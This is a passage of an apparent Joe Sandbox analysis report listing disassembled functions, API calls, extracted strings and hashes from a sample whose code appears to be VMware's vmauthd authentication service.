                                                      • Part of subcall function 6CF876E2: EnterCriticalSection.KERNEL32(?,?,6CF88FB7,?,6CFB7058,00000008,6CF89130,00000001,?,?), ref: 6CF876F1
                                                    • EnumSystemLocalesW.KERNEL32(6CF8EF2D,00000001,6CFB7278,0000000C,6CF8F2FB,00000000), ref: 6CF8EF72
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 93ac1bad6fb446b1e798678ac38553d73676b037d3bcebe0987f7b9d197355b6
                                                    • Instruction ID: 39eeb977bb9c902e1c8323f5871b21fee8863824ec1ef927838f68150d2aa181
                                                    • Opcode Fuzzy Hash: 93ac1bad6fb446b1e798678ac38553d73676b037d3bcebe0987f7b9d197355b6
                                                    • Instruction Fuzzy Hash: 81F04976A11201DFDB00DFA8D445B9C77F0EB4A325F20455BF400EB790CB7659448F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96A27 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96980,00000001,?,?,?,6CF971E8,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6CF96A5E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 5f49dfac53322c97bfd1c1903c6bd23698f2f5a77a475787a1cae271046f8795
                                                    • Instruction ID: d712e9eb5e9822413dde4c96507a49b13f33f32f831427389e906fba25204b40
                                                    • Opcode Fuzzy Hash: 5f49dfac53322c97bfd1c1903c6bd23698f2f5a77a475787a1cae271046f8795
                                                    • Instruction Fuzzy Hash: 6FF0E53670420597DF08AF36C854A6ABFA4EFC2754F0A4459FA19CBA50C6329942C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF61E00 Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61E13
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ContextCryptRelease
                                                    • String ID:
                                                    • API String ID: 829835001-0
                                                    • Opcode ID: 80aec0291cc36fa19a5b09005480caca44a8eab3df6369b9fbf7187c0cc9e249
                                                    • Instruction ID: 9856cf2a31dc832bbf7d7be66b7c25d90b905e6721956e7bcf59809ff84c71c9
                                                    • Opcode Fuzzy Hash: 80aec0291cc36fa19a5b09005480caca44a8eab3df6369b9fbf7187c0cc9e249
                                                    • Instruction Fuzzy Hash: 13D02E71B0035013E6204B18AC02BCBBAEC9F22B08F10C81EB584E6A90CBB0E440C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED90E3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000090F0,00ED8B75), ref: 00ED90E8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 2705f8ca28d970ffe95477bea1fd8aa628c4027e67f160d8ed0c798ccfeaee8d
                                                    • Instruction ID: 2b0364e40a9d5fd74e631588d7a9966a6fe5205aac3f34b66bd01c5c27a8525c
                                                    • Opcode Fuzzy Hash: 2705f8ca28d970ffe95477bea1fd8aa628c4027e67f160d8ed0c798ccfeaee8d
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF9494E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: bf6d162859ba607f939afde54b893d71c61dc44ef1019e334395fe6c29986289
                                                    • Instruction ID: 69c77fde557f9a1f5f446bbcde330e08629959b6bf7a17b7371cdf3654086a03
                                                    • Opcode Fuzzy Hash: bf6d162859ba607f939afde54b893d71c61dc44ef1019e334395fe6c29986289
                                                    • Instruction Fuzzy Hash: B8A02430F10101CF4FC04F31434434D37FC55033D131400147104C1110D77440404700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED44F0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 261threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE ref: 00ED44F7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED44FD
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000034), ref: 00ED4507
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00ED4531
                                                    • srand.API-MS-WIN-CRT-UTILITY-L1-1-0(-0000058F), ref: 00ED453D
                                                    • GetLastError.KERNEL32 ref: 00ED457E
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4585
                                                    • CloseHandle.KERNEL32(?), ref: 00ED476B
                                                    • TerminateThread.KERNEL32(?,00000000), ref: 00ED4788
                                                    • CloseHandle.KERNEL32(?), ref: 00ED4794
                                                    • TerminateThread.KERNEL32(?,00000000), ref: 00ED47C2
                                                    • CloseHandle.KERNEL32 ref: 00ED47CE
                                                    • CloseHandle.KERNEL32(?), ref: 00ED47F1
                                                    • closesocket.WS2_32(?), ref: 00ED4806
                                                    • closesocket.WS2_32(?), ref: 00ED4815
                                                    • CloseHandle.KERNEL32(?), ref: 00ED4823
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED482A
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Strings
                                                    • Failed to create event for process creation notification: %s (%d) , xrefs: 00ED474E
                                                    • calloc() failed., xrefs: 00ED4516
                                                    • Call to Create reaper thread failed: %s (%d) , xrefs: 00ED471C
                                                    • Failed to create event for named pipe: %s (%d) , xrefs: 00ED4613
                                                    • Failed to create event for termination notification: %s (%d) , xrefs: 00ED4735
                                                    • Failed to create event for listen socket: %s (%d) , xrefs: 00ED458B, 00ED45D1
                                                    • Call to Create service thread failed: %s (%d) , xrefs: 00ED46FA
                                                    • Failed to create event for shutdown notfication: %s (%d) , xrefs: 00ED464B
                                                    • authd.client.port, xrefs: 00ED4548
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Warning$ErrorLast$TerminateThreadclosesocketfree$_printf_time64callocsrand
                                                    • String ID: Call to Create reaper thread failed: %s (%d) $Call to Create service thread failed: %s (%d) $Failed to create event for listen socket: %s (%d) $Failed to create event for named pipe: %s (%d) $Failed to create event for process creation notification: %s (%d) $Failed to create event for shutdown notfication: %s (%d) $Failed to create event for termination notification: %s (%d) $authd.client.port$calloc() failed.
                                                    • API String ID: 3761548739-2450155441
                                                    • Opcode ID: cc2f2cb5728c92752740c2bbdac35c5d885404f4914d3d1e57dfcf8d510e5422
                                                    • Instruction ID: b2aa4aadd9b97e642f012880c62f2571dcb8583918e707372735a6d6c6d475ad
                                                    • Opcode Fuzzy Hash: cc2f2cb5728c92752740c2bbdac35c5d885404f4914d3d1e57dfcf8d510e5422
                                                    • Instruction Fuzzy Hash: DC8123F1641301AFD7106FB1BC4AB6A77A8EB25705F142127FA15F63C1DB70EA068B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2850 Relevance: 71.9, APIs: 31, Strings: 10, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,00ED269A), ref: 00ED2864
                                                    • Warning.VMWAREBASE(?,?,00000000,00000000,?,00ED269A), ref: 00ED2871
                                                    • Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2887
                                                    • Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2894
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED289C
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A3
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A9
                                                    • Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28AF
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28B5
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28BB
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00ED28C7
                                                    • Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED28D2
                                                    • Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28E7
                                                    • Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28F6
                                                    • Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2910
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2918
                                                    • Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED292B
                                                    • Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2939
                                                    • Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2949
                                                    • Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2956
                                                    • Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00ED2963
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED296B
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED2972
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED2978
                                                    • Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED297E
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000), ref: 00ED2984
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,00000000), ref: 00ED298A
                                                    • Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED2998
                                                    • Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED299E
                                                    • Warning.VMWAREBASE(00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED29AA
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED29B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: %s\%s$log.fileName$log.logMinLevel$log.suffix$log.syslogID$log.syslogMinLevel$log.systemAreaTemp$vmauthd$vmauthd.log$vmauthd.log.fileName
                                                    • API String ID: 2642810717-3249989834
                                                    • Opcode ID: c589fa23bbbf17402aba5235fe9c044e8052931781ec94f6e92fdb6feffd6e50
                                                    • Instruction ID: 451637cbb4a55ac2dd49375405d112757526c8649ec2433813815527c11f755c
                                                    • Opcode Fuzzy Hash: c589fa23bbbf17402aba5235fe9c044e8052931781ec94f6e92fdb6feffd6e50
                                                    • Instruction Fuzzy Hash: 573181A0A8131471DA2037B50DDBFAF25ECCF91B55F05752BF924B6383FAA9850381B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED7CD0 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00ED8208,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7CFA
                                                    • Warning.VMWAREBASE([Ticket] Unable to open dir %s,00ED8208,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D0F
                                                    • Warning.VMWAREBASE(?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D3A
                                                    • Warning.VMWAREBASE(vmtck-,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D46
                                                    • Warning.VMWAREBASE(?,00000000,00000000,vmtck-,00000000,00000000,00000000,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D69
                                                    • Warning.VMWAREBASE(00ED8208,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00ED8208,?), ref: 00ED7D83
                                                    • Warning.VMWAREBASE(00000000,00ED8208,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00ED8208), ref: 00ED7D8B
                                                    • Warning.VMWAREBASE(00000006,[Ticket] Reaping stale ticket %s,00000000), ref: 00ED7DC3
                                                    • Warning.VMWAREBASE(00000000,00000006,[Ticket] Reaping stale ticket %s,00000000), ref: 00ED7DC9
                                                    • Warning.VMWAREBASE ref: 00ED7DD8
                                                    • Warning.VMWAREBASE([Ticket] Failed to remove stale ticket %s: %s,00000000,00000000), ref: 00ED7DE4
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00ED7E16
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00ED8208,?,00000000), ref: 00ED7E34
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E53
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED7E71
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E85
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00ED7E8E
                                                    Strings
                                                    • [Ticket] Failed to remove stale ticket %s: %s, xrefs: 00ED7DDF
                                                    • [Ticket] Failed to stat ticket %s: %s, xrefs: 00ED7E08
                                                    • [Ticket] Unable to open dir %s, xrefs: 00ED7D0A
                                                    • [Ticket] Reaping stale ticket %s, xrefs: 00ED7DB9
                                                    • vmtck-, xrefs: 00ED7D3F, 00ED7D5B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_errno
                                                    • String ID: [Ticket] Failed to remove stale ticket %s: %s$[Ticket] Failed to stat ticket %s: %s$[Ticket] Reaping stale ticket %s$[Ticket] Unable to open dir %s$vmtck-
                                                    • API String ID: 2549721144-1566788480
                                                    • Opcode ID: e1c70aedf5e32c5cc97507da00bdccc8f763162fecb949db39426ef158d6cf16
                                                    • Instruction ID: d8844f0b5db69a6ee20b33abc31cb9ca69003627e94d6a11cbec91c21bcb01fd
                                                    • Opcode Fuzzy Hash: e1c70aedf5e32c5cc97507da00bdccc8f763162fecb949db39426ef158d6cf16
                                                    • Instruction Fuzzy Hash: 11512670A05215AFCB10AFB8DC46ABE7BB5EF05304F0411ABFD55B3352E6319E1287A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED4280 Relevance: 45.6, APIs: 19, Strings: 7, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(Service Paused.), ref: 00ED42A8
                                                    • Warning.VMWAREBASE(Service Continuing.), ref: 00ED42C4
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED4304
                                                    • GetLastError.KERNEL32 ref: 00ED430E
                                                    • GetLastError.KERNEL32 ref: 00ED4314
                                                    • Warning.VMWAREBASE(Unknown service opcode %d,?), ref: 00ED442F
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED4442
                                                    • GetLastError.KERNEL32 ref: 00ED444C
                                                    Strings
                                                    • SetServiceStatus failed while stopping(error %d)., xrefs: 00ED431B
                                                    • Service Continuing., xrefs: 00ED42B5
                                                    • Unknown service opcode %d, xrefs: 00ED442A
                                                    • Service being interrogated...., xrefs: 00ED441B
                                                    • Service Paused., xrefs: 00ED4299
                                                    • SetServiceStatus failed (error %d)., xrefs: 00ED4453
                                                    • Service Stopped., xrefs: 00ED4402
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastWarning$ServiceStatus
                                                    • String ID: Service Continuing.$Service Paused.$Service Stopped.$Service being interrogated....$SetServiceStatus failed (error %d).$SetServiceStatus failed while stopping(error %d).$Unknown service opcode %d
                                                    • API String ID: 4115867675-2117255868
                                                    • Opcode ID: 9de5b6f713cb61f100e2fcfe783f0f490322a98fe8daadf74e754e54e8a1c995
                                                    • Instruction ID: 717885a5b9c318273bd9efccda8e9fd16a1b88d8727f4cb0772a1faad3d51e7a
                                                    • Opcode Fuzzy Hash: 9de5b6f713cb61f100e2fcfe783f0f490322a98fe8daadf74e754e54e8a1c995
                                                    • Instruction Fuzzy Hash: 95419AB1142388DFD7102B62FD4AB593BA5FB24B45F04A067F619B42A0C37559C9EB22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3710 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 194synchronizationnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,00000001,?,00000000,00ED13A6), ref: 00ED377C
                                                    • WSAGetLastError.WS2_32(?,00000000,00ED13A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3787
                                                    • WaitForSingleObject.KERNEL32(?,?,?,00000000,00ED13A6), ref: 00ED37A8
                                                    • Warning.VMWAREBASE(?,?,UTF-8,?,00000000,00ED13A6), ref: 00ED38A0
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED2780: Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,00ED13A6), ref: 00ED278B
                                                      • Part of subcall function 00ED2780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003), ref: 00ED27AF
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED38FC
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED3919
                                                    Strings
                                                    • Data not in UTF-8 format, xrefs: 00ED38BF
